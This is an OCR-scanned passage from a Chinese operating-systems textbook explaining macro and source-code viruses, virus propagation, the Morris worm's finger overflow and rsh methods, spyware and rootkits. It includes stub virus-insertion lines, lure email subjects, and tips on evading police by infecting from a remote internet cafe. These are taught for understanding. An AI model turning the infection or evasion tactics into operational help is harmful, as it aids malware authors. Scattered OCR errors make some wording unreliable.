而 不 影响 其 执行 的 效果 。 宏 可 以 是 针对 特定 的 文档 ， 所 以 Office 就 可 以 为 每 一 个 文档 建立 宏 。 
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现在 我 们 看 一 看 问题 所 在 。Virgil 在 Word 里 建立 了 一 个 文档 并 创建 了 包含 OPEN FILE 功 能 的 宏 。 这 
个 宏 含 有 一 个 宏 病毒 代码 。 然 后 他 将 文档 发 送 给 受害 人 ， 受 害 人 很 自然 地 打开 文件 (假设 E-mail 程序 还 
没有 打开 文件 ) ， 导 致 OPEN FILE 宏 开始 运行 。 既 然 宏 可 以 包含 任意 程序 ， 它 就 可 以 做 任何 事情 ， 如 感 
染 其 他 的 Word 文 档 ， 删 除 文 件 等 。 对 Microsoft 来 说 ，Word 在 打开 含有 宏 的 文件 时 确实 能 给 出 警告 ， 但 
大 多 数 用 户 并 不 理解 警告 的 含义 并 继续 执行 打开 操作 。 而 且 ， 合 法 文件 也 会 包含 宏 。 还 有 很 多 程序 甚至 
不 给 出 警告 ， 这 样 就 更 难以 发 现 病毒 了 。 

随 着 E-mail 附 件数 量 的 增长 ， 发 送 嵌 有 安 病毒 的 文档 成 为 越 来 越 严重 的 问题 。 比 起 把 真正 的 引导 硼 
区 隐藏 在 坏 块 列表 以 及 把 病毒 蕊 在 中 断 向 量 里 ， 这 样 的 病毒 更 容易 编写 。 这 意味 着 更 多 缺乏 专业 知识 的 
人 都 能 制造 病毒 ， 从 而 降低 了 病毒 产品 的 质量 ， 给 病毒 制造 者 带 来 了 坏 名 声 。 

8. 源 代 码 病毒 

寄生 病毒 和 引导 区 病毒 对 操作 系统 平台 有 很 高 的 依赖 性 ， 文 件 病毒 的 依赖 性 就 小 得 多 (Word 运行 
在 Windows 和 Macintosh 上 ， 但 不 是 UNIX)。 最 具 移植 性 的 病毒 是 源 代 码 病毒 (source code virus)。 请 想 
象 图 9-27， 若 该 病毒 不 是 寻找 可 执行 二 进 制 文件 ， 而 是 寻找 C 语 言 程序 并 加 以 改变 ， 则 仅仅 改动 一 行 即 
可 (调用 access)。infect 过 程 可 以 在 每 个 漂 程序 文件 头 插 入 下 面 一 行 ， 

#include <virus.h> 

还 可 以 插入 下 面 一 行 来 激活 病毒 : 

run_virus(); 
判断 在 什么 地 方 插入 需要 对 C 程 序 代码 进行 分 析 ， 插 入 的 地 方 必须 能 够 允许 合法 的 过 程 调用 并 不 会 成 为 
无 用 代码 (如 插入 在 return 语 名 后面 )。 插 入 在 注释 语句 里 也 没什么 效果 ， 插 入 在 循环 语句 里 倒 可 能 是 个 
极 好 的 选择 。 假 设 能 够 正确 地 插入 对 病毒 代码 的 调用 (如 正好 在 main 过 程 结束 前 ， 或 在 return 语 句 结束 
前 )， 当 程序 被 编译 时 就 会 从 virus.h 处 虽然 proj.h 可 能 会 引起 更 少 的 注意 ) 获得 病毒。 

当 程序 运行 时 ， 病 毒 也 被 调用 。 病 毒 可 以 做 任何 操作 ， 如 查找 并 感染 其 他 的 C 语 言 程序 。 一 旦 找到 
一 个 C 语 言 程序 ， 病 毒 就 插入 上 面 两 行 代码 ， 但 这 样 做 仅 对 本 地 计算 机 有 效 ， 并 且 virus h 必 须 安放 妥当 。 
要 使 病毒 对 远程 计算 机 也 奏效 ， 程 序 中 必须 包括 所 有 的 病毒 源 代码 。 这 可 以 通过 把 源 代码 作为 初始 化 后 
字符 串 来 实现 ， 特 别 是 使 用 一 串 32 位 的 十 六 进 制 整数 来 防止 他 人 识破 企图 。 字 符 串 也 许 会 很 长 ， 但 是 对 
于 今天 的 大 型 代码 而 言 ， 这 是 可 以 轻易 实现 的 。 

对 初学 读者 来 说 ， 所 有 这 些 方法 看 起 来 都 比较 复杂 。 有 人 也 许 会 怀疑 这 样 做 是 否 在 操作 上 可 行 。 事 实 
上 是 可 行 的 。Virgil 是 极为 出 色 的 程序 员 ， 而 且 他 手头 有 许多 空闲 时 间 。 读 者 可 以 看 看 当地 的 报纸 就 知道 了 。 

9. 病毒 如 何 传播 

病毒 的 传播 需要 很 多 条 件 。 让 我 们 从 最 古典 的 方式 谈 起 。Virgil 编 写 了 一 个 病毒 ， 把 它 放 进 了 自己 的 
程序 (或 窃取 来 的 程序 ) 里 ， 然 后 开始 分 发 程序 ， 如 放 入 共享 软件 站 点 。 最 后 ， 有 人 下 载 并 运行 了 程序 。 
这 时 有 好 几 种 可 能 。 病 毒 可 能 开始 感染 硬盘 里 的 大 多 数 文件 ， 其 中 有 些 文件 被 用 户 共享 给 了 自己 的 朋友 。 
病毒 也 可 以 试图 感染 硬盘 的 引导 扁 区 。 一 旦 引导 扇 区 被 感染 ， 就 很 容易 在 核心 态 下 放置 内 存 驻 留 病毒 。 

现在 ，Virgil 也 可 以 利用 其 他 更 多 的 方式 。 可 以 用 病毒 程序 来 查看 被 感染 的 计算 机 是 否 连 接 在 局 域 
网 上 ， 如 一 台 机 器 很 可 能 属于 某 个 公司 或 大 学 的 。 然 后 ， 就 可 以 通过 该 局 域 网 感染 所 有 服务 器 上 未 被 保 
护 的 文件 。 这 种 感染 不 会 扩散 到 已 被 保护 的 文件 ， 但 是 会 让 被 感染 的 文件 运行 起 来 十 分 奇怪 。 于 是 ， 运 
行 这 类 程序 的 用 户 会 寻求 系统 管理 员 的 帮助 ， 系 统管 理 员 会 亲自 试验 这 些 奇怪 的 文件 ,看 看 是 怎么 会 事 。 
如 果 系 统管 理 员 此 时 用 超级 用 户 登录 ， 病 毒 会 感染 系统 代码 、 设 备 驱动 程序 、 操 作 系统 和 引导 扁 区 。 犯 
类 似 这 样 的 一 个 错误 ， 就 会 危及 局 域 网 上 所 有 计算 机 的 安全 。 

运行 在 局 域 网 上 的 计算 机 通常 有 能 力 通过 Internet 或 私人 网 络 登 录 到 远程 计算 机 上 上， 或 者 甚至 有 权 
无 须 谷 录 就 远程 执行 命令 。 这 种 能 力 为 病毒 提供 了 更 多 传播 的 机 会 。 所 以 往往 一 个 微小 的 错误 就 会 感染 
整个 公司 。 要 避免 这 种 情况 ， 所 有 的 公司 应 该 制定 统一 的 策略 防止 系统 管理 员 犯 错误 。 

另 一 种 传播 病毒 的 方法 是 在 经 常 发 布 程序 的 USENET 新 闻 组 或 网 站 上 张贴 已 被 感染 病毒 的 程序 。 也 
可 以 建立 一 个 需要 特别 的 浏览 器 插件 的 网 页 ， 然 后 确保 插件 被 病毒 感染 上 。 

还 有 一 种 攻击 方式 是 把 感染 了 病毒 的 文档 通过 E-mail 方 式 或 USENET 新 闻 组 方式 发 送 给 他 人 ， 这 些 
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文档 被 作为 邮件 的 附件 。 人 们 从 未 想到 会 去 运行 一 个 陌生 人 邮 给 他 们 的 程序 ， 他 们 也 许 没有 想到 ， 点 击 
打开 附件 导致 在 自己 的 计算 机 上 释放 了 病毒 。 更 精 的 是 ， 病 毒 可 以 寻找 用 户 的 邮件 地 址 第 ， 然 后 把 自己 
转发 给 地 址 敌 里 所 有 的 人 ， 通 常 这 些 邮件 是 以 看 上 去 合法 的 或 有 趣 的 标题 开头 的 。 例 如 : 

Subject; Change of plans 

Subject; Re; that last e-mail 

Subject: The dog died last night 

Subject; 1 ат seriously ill 

Subject; I love you 

当 邮 件 到 达 时 ， 收 信人 看 到 发 件 人 是 朋友 或 同事 ， 就 不 会 怀疑 有 问题 。 而 一 日 邮件 被 打开 就 太 晚 了 。 
“ILOVE YOU” 病 毒 在 2000 年 6 月 就 是 通过 这 种 方法 在 世界 范围 内 传播 的 ， 并 导致 了 数 十 亿美 元 的 损失 。 

与 病毒 的 传播 相 联系 的 是 病毒 技术 的 传播 。 在 Internet 上 有 多 个 病毒 制造 小 组 积极 地 交流 ， 相 互 帮 助 
开发 新 的 技术 、 工 具 和 病毒 。 他 们 中 的 大 多 数 人 可 能 是 对 病毒 有 妆 好 的 人 而 不 是 职业 徘 犯 ， 但 带 来 的 后 
果 却 是 灾难 性 的 。 另 一 类 病毒 制造 者 是 军人 ， 他 们 把 病毒 作为 潜在 的 战争 武器 来 破坏 敌人 的 计算 机 系统 。 

与 病毒 传播 相关 的 另 一 个 话题 是 逃避 检测 。 监 狼 的 计算 设施 非常 差 ， 所 以 Virgil 宁 愿 避 开 他 们 。 如 
果 Virgil 将 最 初 的 病毒 从 家 里 的 计算 机 张贴 到 网 上 ， 就 会 产生 危险 。 一 旦 攻击 成 功 ， 警 察 就 能 通过 最 近 
病毒 出 现 过 的 时 间 信 息 跟 踪 查找 ， 因 为 这 些 信息 最 有 可 能 接近 病毒 来 源 。 

为 了 减少 暴露 ，Virgil 可 能 会 通过 一 个 偏远 城市 的 网 吧 登 录 到 Internet 上 。 他 既 可 以 把 病毒 带 到 软盘 
上 自己 打开 ， 也 可 以 在 没有 软磁盘 驱动 器 的 情况 下 利用 隔壁 女士 的 计算 机 读 取 book .doc 文件 以 便 打 印 。 
一 旦 文件 到 了 Virgil 的 硬盘 ， 他 就 将 文件 名 改 为 Virus .exe 并 运行 ， 从 而 感染 整个 局 域 网 ， 并 且 让 病毒 在 
两 周 后 激活 ， 以 防 警察 列 出 一 周 内 进出 该 城市 机 场 的 可 疑 人 员 名 单 。 

另 一 个 方法 是 不 使 用 软盘 驱动 器 ， 而 通过 远程 FTP 站 点 放置 病毒 。 或 者 带 一 台 笔记 本 电脑 连接 在 网 吧 
的 Ethenet 或 USB 端 口上 ， 而 网 吧 里 确实 有 这 些 服务 设备 供 携带 笔记 本 电脑 的 游客 每 天 查阅 自己 的 电 子 邮件 。 

关于 病毒 还 有 很 多 需要 讨论 的 内 容 ， 尤其 是 他 们 如 何 隐藏 自己 以 及 杀毒 软件 如 何 将 之 发 现 。 在 本 章 
后 面 讨论 恶意 软件 防护 的 时 候 我 们 会 加 到 这 个 话题 。 
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互联 网 计算 机 发 生 的 第 一 次 大 规模 安全 灾难 是 在 1988 年 的 11 月 2 日 ， 当时 Cornell 大 学 毕业 生 Robert 
Tappan Morris 在 Internet 网 上 发 布 了 一 种 蠕虫 程序 ， 结 果 导 致 了 全 世界 数 以 千 计 的 大 学 、 企业 和 政府 实 
验 室 计算 机 的 瘫痪 。 这 也 导致 了 一 直 未 能 平息 的 争论 。 我 们 稍 后 将 重点 描述 。 具 体 的 技术 细节 请 参阅 
Spafford 的 论文 1989 版 )， 有 关 这 一 事件 的 警方 惊险 搞 述 请 参见 Hafner 和 Markoff 的 书 (1991 版 ) 。 

故事 发 生 在 1988 年 的 某 个 时 候 ， 当时 Morris 在 Berkeley 大 学 的 UNIX 系 统 里 发 现 了 两 个 bug， 使 他 能 
不 经 授权 接触 到 Internet 网 上 所 有 的 计算 机 。Morris 完 全 通过 自身 努力 ， 写 了 一 个 能 够 自我 复制 的 程序 ， 
КАБ Ж (worm)。 蠕 虫 可 以 利用 UNIX 的 bug， 在 数秒 种 内 自我 复制 ， 然后 迅速 传染 到 所 有 的 机 器 。 
Morris 为 此 工作 了 好 几 个 月 ， 并 想方设法 调试 以 逃避 跟踪 。 

现在 还 不 知道 1988 年 11 月 2 日 的 发 作 是 否 是 一 次 实验 ， 还 是 一 次 真正 的 攻击 。 不 管 怎么 说 ， 病 毒 确 
实 让 大 多 数 Sun 和 VAX 系 统 在 数 小 时 内 臣服 。Morris 的 动机 还 不 得 而 知 ， 也 有 可 能 这 是 他 开 的 一 个 高 科 
技 玩笑 ， 但 由 于 编程 上 的 错误 导致 局 面 无 法 控制 。 

从 技术 上 来 说 ， 蠕 虫 包含 了 两 部 分 程序 ， 引 导 程 序 和 蠕虫 本 身 。 引导 程序 是 99 行 的 称 为 11.c 的 程序 ， 
它 在 被 攻击 的 计算 机 上 编译 并 运行 。 一 旦 发 作 ， 它 就 在 源 计算 机 与 宿主 机 之 间 建 立 连接 ， 上 传 蠕 虫 主体 
并 运行 。 在 花费 了 一 番 周 折 隐 藏 自 身后 ， 蠕虫 会 查看 新 宿主 机 的 路 由 表 看 它 是 否 连接 到 其 他 的 机 器 上 ， 
通过 这 种 方式 蠕虫 把 引导 程序 传播 到 所 有 相连 的 机 器 。 

蠕虫 在 感染 新 机 器 时 有 三 种 方法 。 方法 1 是 试图 使 用 rsh 命 令 运行 远程 shell 程 序 。 有 些 计算 机 信任 其 
他 机 器 ， 允 许 其 他 机 器 不 经 校 验 就 可 运行 rsh 命 令 。 如 果 方 法 一 可 行 ， 远 程 shell 会 上 传 蠕虫 主体 ， 并 从 那 
里 继续 感染 新 的 计算 机 。 

方法 2 是 使 用 一 种 在 所 有 系统 上 叫做 finger 的 程序 ， 该 程序 允许 Internet 上 任何 地 方 的 用 户 通过 键入 
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来 显示 某 人 的 在 特定 安装 下 的 个 人 信息 。 这 些 信息 通常 包括 : 个 人 姓名 、 登 录 名 、 工 作 和 家 庭 地 址 、 电 
话 号 码 、 传 真 号 码 以 及 类 似 的 信息 。 这 有 点 像 电话 本 。 

finger 是 这 样 工 作 的 。 在 每 个 站 点 有 一 个 叫做 finger 宁 护 进程 的 后 台 进 程 ， 它 一 直 保持 运行 状态 ， 监 
视 并 回答 所 有 来 自 因特网 的 查询 。 蠕 虫 所 做 的 是 调用 finger， 并 用 一 个 精心 编写 的 、 由 536 个 特殊 字 节 组 
成 的 字符 串 作 为 参数 。 这 一 长 串 覆 盖 了 守护 进程 的 缓冲 和 栈 , .如 图 9-24c 所 示 。 这 里 所 利用 的 缺陷 是 守 
护 进程 没有 检查 出 缓冲 区 和 栈 的 溢出 情形 。 当 守护 进程 从 它 原先 获得 请 求 时 所 在 的 过 程 中 返回 时 ， 它 返 
回 的 不 是 main， 而 是 找 上 536 字 节 中 包含 的 过 程 。 该 过 程 试 图 运行 sh。 如 果 成 功 ， 蠕 虫 就 掌握 了 被 攻击 
计算 机 里 运行 的 shell。 

方法 3 是 依靠 在 电子 邮件 系统 里 的 sendmail 程 序 ， 利 用 它 的 bug 克 许 蠕虫 发 送 引导 程序 的 备份 并 运行 。 

蠕虫 一 旦 出 现 就 准备 破解 用 户 密码 。Morris 没 有 在 这 方面 做 大 量 的 有 关 研 究 。 他 所 做 的 是 问 自己 的 
父亲 ， 一 名 美国 国家 安全 局 (该 局 是 美国 政府 的 密码 破解 机 构 ) 的 安全 专家 ， 要 一 份 Morris Sr 和 Ken 
Thompson 十 年 前 在 Bell 实 验 室 合 著 的 经 典 论文 《Morris 和 Thompson,1979)。 每 个 被 破译 的 密码 允许 蠕虫 
登录 到 任何 该 密码 所 有 者 具有 账号 的 计算 机 上 。 

每 一 次 蠕虫 访问 到 新 的 机 器 ， 它 就 查看 是 否 有 其 他 版 本 的 蠕虫 已 经 存活 。 如 果 有 ,新 的 版 本 就 退出 ， 
但 七 次 中 有 一 次 新 蠕虫 不 会 退出 。 即 使 系统 管理 员 启 动 了 旧 蠕 虫 来 愚弄 新 蠕虫 也 是 如 此 ， 这 大 概 是 为 了 
给 自己 做 宣传 。 结 果 ， 七 次 访问 里 的 一 次 产生 了 太 多 的 蠕虫 ,导致 了 所 有 被 感染 机 器 的 停机 ， 它 们 被 蠕 
虫 感染 了 。 如 果 Morris 放 弃 这 一 策略 ， 只 是 让 新 蠕虫 在 旧 蠕虫 存在 的 情况 下 退出 ， 蠕 虫 也 许 就 不 那么 容 
易 被 发 现 了 。 

当 Morris 的 一 个 朋友 试图 向 纽约 时 报 记者 John Markoff 说 明 整个 事件 是 个 意外 ， 蠕 虫 是 无 害 的 ， 作 
者 也 很 遗憾 等 的 时 候 ，Morris 被 捕 了 。Morris 的 朋友 不 经 意 地 流露 出 罪犯 的 登录 名 是 rm。 把 rm 转换 成 
用 户 名 十 分 简单 一 一 Markoff 所 要 做 的 只 是 运行 finger。 第 二 天 ， 故 事 上 了 头条 新 闻 ， 三 天 后 影响 力 甚至 
超过 了 总 统 选举 。 

Morris 被 联邦 法 院 审判 并 证 实 有 罪 。 他 被 判 10 000 美 元 罚款 ， 三 年 察看 和 400 小 时 的 社区 服务 。 他 的 法 
律 费用 可 能 超过 了 150 000 美 元 。 这 一 判决 导致 了 大 量 的 争论 。 许 多 计算 机 业界 人 员 认 为 他 是 个 聪明 的 研究 
生 ， 只 不 过 恶作剧 超出 了 控制 。 蠕 虫 程序 里 没有 证 据 表明 Morris 试 图 偷窃 或 毁坏 什么 。 而 其 他 人 认为 Morris 
是 个 严重 的 罪犯 必须 中 监狱。Morris 后 来 在 哈佛 大 学 获得 了 博士 学 位 ， 现 在 他 是 一 名 麻 省 理工 学 院 的 教授 。 

这 一 事件 导致 的 永久 结果 是 建立 了 计算 机 应 急 响应 机 构 (Computer Emergency Response Team, 
CERT)， 这 是 一 个 发 布 病毒 人 侵 报告 的 中 心机 构 ， 有 多 名 专家 分 析 安 全 问题 并 设计 补丁 程序 。CERT 有 了 
自己 的 下 载 网 站 ，CERT 收 集 有 关 会 受到 攻击 的 系统 缺陷 方面 的 信息 并 告知 如 何 修复 。 重 要 的 是 ， 它 把 这 
类 信息 周期 发 布 给 Internet 上 的 数 以 千 计 的 系统 管理 员 。 但 是 ， 某 些 别有用心 的 人 (可 能 假装 成 系统 管理 
A) 也 可 以 得 到 关于 系统 bug 的 报告 ， 并 在 这 些 bug 修 复 之 前 花费 数 小 时 (或 数 天 ) 寻找 破门 的 捷径 。 

从 Morris 蠕 虫 出 现 开始 ， 越 来 越 多 种 类 的 蠕虫 病毒 出 现在 网 络 上 。 这 些 蠕虫 病毒 的 机 制 与 Morris 一 
样 ， 所 不 同 之 处 只 是 利用 系统 中 不 同 软件 的 不 同 漏洞 。 由 于 蠕虫 能 够 自我 复制 ， 因 此 扩散 趋势 比 病毒 要 
tk. KERE, 越 来 越 多 的 反 蠕虫 技术 被 开发 出 来 ， 它 们 大 多 都 试图 在 蠕虫 第 一 次 出 现 的 时 候 将 其 发 现 ， 
而 不 是 在 它们 进入 中 心 数据 库 时 才 实施 侦 测 (Portokalidis 和 Bos, 2007)。 


9.7.4 间谍 软件 

间谍 软件 (spyware) 是 一 种 迅速 扩散 的 恶意 软件 ， 粗 略 地 讲 ， 间 谨 软 件 是 在 用 户 不 知情 的 情况 下 
加 载 到 PC 上 的 ， 并 在 后 台 做 一 些 超 出 用 户 意愿 的 事情 。 但 是 要 定义 它 却 出 平 意料 的 微妙 。 比 如 Windows 
自动 更 新 程序 下 载 安全 组 件 到 安装 有 Windows 的 机 器 上 ， 用 户 不 需要 干预 。 同 样 地 ， 很 多 反 病 毒 软件 也 
在 后 台 自 动 更 新 。 上 述 的 两 种 情况 都 不 被 认为 是 间谍 软件 。 如 果 Potter Stewart 还 健在 的 话 ， 他 也 许 会 说 ; 
“我 不 能 定义 间谍 软件 ， 但 只 要 我 看 见 它 ， 我 就 知道 .” 

其 他 人 通过 努力 ， 进 一 步 地 尝试 定义 间谍 软件 。Barwinski 等 人 认为 它 有 四 个 特征 : 首先 ， 它 隐藏 
自身 ， 所 以 用 户 不 能 轻易 地 找到 ， 其 次 ， 它 收集 用 户 数据 (如 访问 过 的 网 址 、 口 令 或 信用 卡号 ) ， 再 次 ， 
它 将 收集 到 的 资料 传 给 远程 的 监控 者 ， 最 后 ， 在 卸 载 它 时 ， 间 谍 软 件 会 试图 进行 防御 。 此 外 ， 一 些 间谍 
软件 改变 设置 或 者 进行 其 他 的 恶意 行为 。 
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Barwinski 等 人 将 间谍 软件 分 成 了 三 大 类 。 第 一 类 是 为 了 营销 ; 该 类 软件 只 是 简单 地 收集 信息 并 发 
送 给 控制 者 ， 以 更 好 地 将 广告 投放 到 特定 的 计算 机 。 第 二 类 是 为 了 监视 ， 某 些 公司 故意 在 职员 的 电脑 上 
安装 间谍 软件 ， 监 视 他 们 在 做 什么 ， 在 浏览 什么 网 站 。 第 三 类 接近 于 典型 的 恶意 软件 ， 被 感染 的 电脑 成 
为 僵尸 网 络 中 的 一 部 分 ， 等 待 控制 者 的 指令 。 

他 们 做 了 一 个 实验 ， 通 过 访问 5000 个 网 站 看 什么 样 的 网 站 含有 间谍 软件 。 他 们 发 现 这 些 网 站 和 成 人 
娱乐 、 盗 版 软件 、 在 线 旅行 有 关 。 

华盛顿 大 学 做 了 一 个 覆盖 面 更 广 的 调查 (Moshchuk 等 人 ，2006)。 在 他 们 的 调查 中 ， 约 18 000 000 
个 URL 被 感染 ， 并 且 6% 被 发 现 含有 间谍 软件 。 所 以 AOL/NCSA 所 作 的 调查 就 不 奇怪 了 : 在 接受 调查 的 
家 用 计算 机 中 ，80% 深 受 间 谨 软 件 的 危害 ， 平 均 每 台 计算 机 有 93 个 该 类 软件 。 华 盛 顿 大 学 的 调查 发 现成 
人 、 明 星 和 桌面 壁纸 相关 的 网 站 有 最 高 的 感染 率 ， 但 他 们 没有 调查 旅行 相关 的 网 站 。 

1. 间谍 软件 如 何 扩散 

显然 ， 接 下 来 的 问题 是 :“ 一 台 计算 机 是 如 何 被 间谍 软件 感染 的 ? ”一 种 可 能 途径 和 所 有 的 恶意 软 
件 是 一 样 的 : 通过 木马 。 不 少 的 免费 软件 是 包含 有 间谍 软件 的 ， 软 件 的 开发 者 可 能 就 是 通过 间谍 软件 而 
获 利 的 。P2P 文 件 共享 软 件 〈 比 如 Kazaa) 就 是 间谍 软件 的 温床 。 此 外 ， 许 多 网 站 显示 的 广告 条 幅 直 接 指 
向 了 含有 间谍 软件 的 网 页 。 

另 一 种 主要 的 感染 途径 叫做 下 载 驱动 (drive-by down load) ， 仅 仅 访问 网 页 就 可 能 感染 间谍 软件 
(实际 上 是 恶意 软件 )。 执 行 感染 的 技术 有 三 种 。 首 先 ， 网 页 可 能 将 浏览 器 导向 一 个 可 执行 文件 (ехе) 。 
当 浏览 器 访问 此 文件 时 ， 会 弹出 一 个 对 话 框 提示 用 户 运 行 、 或 保存 该 文件 。 因 为 合法 文件 的 下 载 也 是 一 
样 的 机 制 ， 所 以 大 部 分 用 户 直 接点 击 执行 ， 导 致 浏览 器 下 载 并 运行 该 软件 。 然 后 电脑 就 被 感染 了 ， 间 谍 
软件 可 以 做 它 想 做 的 任何 事 。 

第 二 种 常见 的 途径 是 被 感染 的 工具 条 。IE 和 Firefox 这 两 种 浏览 器 都 支持 第 三 方 工具 条 。 一 些 间谍 软 
件 的 作者 创建 很 好 看 的 功能 也 不 错 的 工具 条 ， 然 后 广泛 地 宣传 。 用 户 一 旦 安装 了 这 样 的 工具 条 也 就 被 感 
染 了 ， 比 如 ， 流 行 的 Alexa 工 具 条 就 含有 间 谨 软件 。 从 本 质 上 讲 ， 这 种 感染 机 制 很 像 木 马 ， 只 是 包装 不 同 。 

第 三 种 感染 的 途径 更 狼 独 。 很 多 网 页 都 使 用 一 种 微软 的 技术 ， 叫 做 ActiveX 控 件 。 这 些 控件 是 在 济 
览 器 中 运行 并 扩展 其 功能 的 二 进 制 代 码 。 例 如 ， 显 示 某 种 特定 的 图 片 、 音 频 或 视频 网 页 。 从 原则 上 讲 ， 
这 些 技术 非常 合法 。 实 际 上 它 非常 的 危险 ， 并 可 能 是 间谍 软件 感染 的 主要 途径 。 这 项 技术 主要 针对 IE， 
很 少 针对 Firefox 或 其 他 类 型 的 浏览 器 。 

当 访问 一 个 含有 ActiveX 控 件 的 网 页 时 ， 发 生 什么 情况 取决 于 IE 的 安全 性 设置 。 如 果 安全 性 设置 太 
低 ， 间 谍 软件 就 自动 下 载 并 执行 了 。 安 全 性 设置 低 的 原因 是 如 果 设置 太 高 ， 许 多 的 网 页 就 无 法 正常 显示 
(或 根本 无 法 显示 ) ， 或 者 [E 会 一 直 进行 提示 ， 而 用 户 并 不 清楚 这 些 提示 的 作用 。 

现在 我 们 假设 用 户 有 很 高 的 安全 性 设置 。 当 访问 一 个 被 感染 的 网 页 时 ，IE 检 测 到 有 ActiveX 控 件 ， 
然后 弹出 一 个 对 话 框 ， 包 含有 网 页 内 容 提示 ， 比 如 : 

你 希望 安装 并 运行 一 个 能 加 速 网 页 访问 的 程序 吗 ? 

大 多 数 人 认为 很 不 错 ， 然 后 点 “是 "。 好 吧 ， 这 是 过 去 的 事情 。 聪 明 的 用 户 可 能 会 检查 对 话 框 其 他 
的 内 容 ， 还 有 其 他 两 项 。 一 个 是 指向 从 来 没有 听 说 过 的 ， 也 没有 包含 任何 有 用 信息 的 认证 中 心 的 链接 ， 
这 其 实 只 表明 该 认证 中 心 只 担保 这 家 网 站 的 存在 ， 并 有 足够 的 钱 支付 认证 的 费用 。ActiveX 控 件 实际 上 
可 以 做 任何 事情 ， 所 以 它 非常 强大 ， 并 且 可 能 让 用 户 很 头疼 。 由 于 虚假 的 提示 信息 ， 即 使 聪明 的 用 户 也 
常常 选择 “是 "。 

如 果 他 们 点 “不 是 "， 在 网 页 上 的 脚本 则 利用 IE 的 bug， 试 图 继续 下 载 间谍 软件 。 不 过 没有 可 利用 的 
bug， 就 会 一 次 次 试图 下 载 该 控件 ， 一 次 次 的 弹出 同样 的 对 话 框 。 此 时 ， 大 多 数 人 不 知道 该 怎么 办 GT 
开 任 务 管理 器 ， 杀 掉 IE 的 进程 )， 所 以 他 们 最 终 放弃 并 选择 “是 ”。 

通常 情况 下 ， 下 一 步 是 间 谨 软件 显示 20~30 页 用 陌生 的 语言 撰写 的 许可 凭证 。 一 旦 用 户 接受 了 许可 
凭证 ， 他 就 次 失 了 起 诉 间谍 软件 作者 的 机 会 ， 因 为 他 同意 了 该 软件 的 运行 ， 即 使 有 时 候 当 地 的 法 律 并 不 
认可 这 样 的 许可 凭证 《如 果 许 可 赁 证 上 说 “本 凭证 坚定 地 授予 凭证 发 放 者 杀害 凭证 接受 者 的 母亲 ， 并 继 
承 其 遗产 的 权利 "， 赁 证 发 放 者 依然 很 难说 服 法 庭 ) 。 
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2. 间谍 软件 的 行为 

现在 让 我 们 看 看 间谍 软件 的 常见 行为 : 

“更 改 浏览 器 主页 。 

。 修 改 浏 览 器 收藏 页 。 

* 在 浏览 器 中 增加 新 的 工具 条 。 

* 更 改 用 户 默 认 的 媒体 播放 器 。 

"更 改 用 户 默认 的 搜索 引擎 。 

* 在 windows 桌 面 上 增加 新 的 图 标 。 

“将 网 页 上 的 广告 条 替换 成 间谍 软件 期 望 的 样子 。 

“在 标准 的 Windows 对 话 框 中 增加 广告 。 

+ 不 停 地 产生 广告 。 

最 前 面 的 三 条 改变 了 浏览 器 的 行为 ， 即 使 重启 操作 系统 也 不 能 恢复 以 前 的 设置 。 这 种 攻击 叫做 劫持 
浏览 器 (brower hijacking)。 接 下 来 的 两 条 修改 了 Windows 注 册 表 的 设置 ， 把 用 户 引 向 了 另外 的 媒体 播 
放 器 (播放 间谍 软件 所 期 望 的 广告 ) 和 搜索 引擎 (返回 间谍 软件 所 期 望 的 网 页 ) 。 在 桌面 上 添加 图 标 显 
然 是 希望 用 户 运行 新 安装 的 程序 。 替 换 网 页 广告 条 (468 x 60.gif 图 像 ) 就 像 所 有 被 访问 过 网 页 一 样 ， 为 
间谍 软件 指定 的 网 页 打 广告 。 最 后 一 项 是 最 麻烦 的 : 一 个 可 关闭 的 广告 立刻 产生 另 一 个 弹出 广告 ， 以 至 
无 法 结束 。 此 外 ， 间 谍 软 件 常常 关闭 防火 墙 、 卸 载 其 他 的 间谍 软件 ， 并 可 能 导致 其 他 的 恶意 行为 。 

许多 间谍 软件 有 印 载 程序 ， 当 这 些 卸 载 程序 几乎 不 能 用 ， 所 以 经 验 不 足 的 用 户 没有 办 法 卸载 。 幸 运 
的 是 ， 一 个 新 的 反 间谍 软件 产业 已 经 兴起 ， 现 有 的 反 病毒 厂商 跃跃欲试 。 

间谍 软件 不 应 该 和 广告 软件 (adware) 混淆 起 来 ， 合 法 的 软件 生产 商 提供 了 两 种 软件 版 本 ， 一 个 含 
有 广告 的 免费 版 本 和 一 个 不 含 广告 的 付费 版 本 。 软 件 生产 商 的 这 种 办 法 非常 聪明 ， 用 户 为 了 不 受 广告 的 
烦 扰 ， 而 不 得 不 升级 到 付费 版 本 。 


9.7.5 rootkit 

rootkit 是 一 个 程序 或 一 些 程序 和 文件 的 集合 ， 它 试图 隐藏 其 自身 的 存在 ， 即 使 被 感染 主机 的 拥有 者 
已 经 决定 对 其 进行 定位 和 删除 。 在 通常 情况 下 ，rootkit 包 含 一 些 同样 具有 隐藏 性 的 恶意 软件 。rootkit 可 
以 用 我 们 目前 讨论 过 的 任 一 方法 进行 安装 ， 包 括 病毒 、 蠕 虫 和 间谍 软件 ， 也 可 以 通过 其 他 方法 进行 安装 。 
我 们 将 稍 后 讨论 其 中 的 一 种 。 

1. rootkit 的 类 型 

我 们 讨论 目前 可 能 的 五 种 rootkit。 根 据 “rootkit 在 哪里 隐藏 自 己 "， 我 们 自 底 向 上 将 rootkit 分 为 如 下 几 类 : 

1) 国 件 rootkit。 至 少 从 理论 上 讲 ， 一 个 rootkit 可 以 通过 更 新 BIOS 来 隐藏 自己 在 BIOS 中 。 只 要 主机 
被 引导 启动 或 者 一 个 BIOS 函 数 被 调用 ， 这 种 rootkit 就 可 以 获得 控制 。 如 果 rootkit 在 每 次 使 用 后 对 自己 加 
密 而 在 每 次 使 用 前 对 自己 解密 ， 它 就 很 难 被 发 现 。 这 种 rootkit 在 现实 环境 下 还 没有 发 现 。 

2) 管理 程序 rootkit。 这 是 一 种 尤其 乍 鄙 的 rootkit， 它 可 以 在 一 个 由 自己 控制 的 虚拟 机 中 运行 整个 操 
作 系 统 和 所 有 应 用 程序 。 第 一 个 概念 证 明 “ 蓝 药丸 ”(blue pill， 取 自 电影 《黑客 帝国 》) 在 2006 年 被 波兰 
黑客 Joanna Rutkowska 提 出 。 这 种 rootkit 通 常 更 改 引导 顺序 以 便 它 能 在 主机 启动 时 在 裸 机 下 执行 管理 程序 ， 
这 个 管理 程序 会 在 一 个 虚拟 机 中 启动 操作 系统 和 所 有 应 用 程序 。 与 前 一 种 方法 类 似 ， 这 种 方法 的 优点 在 
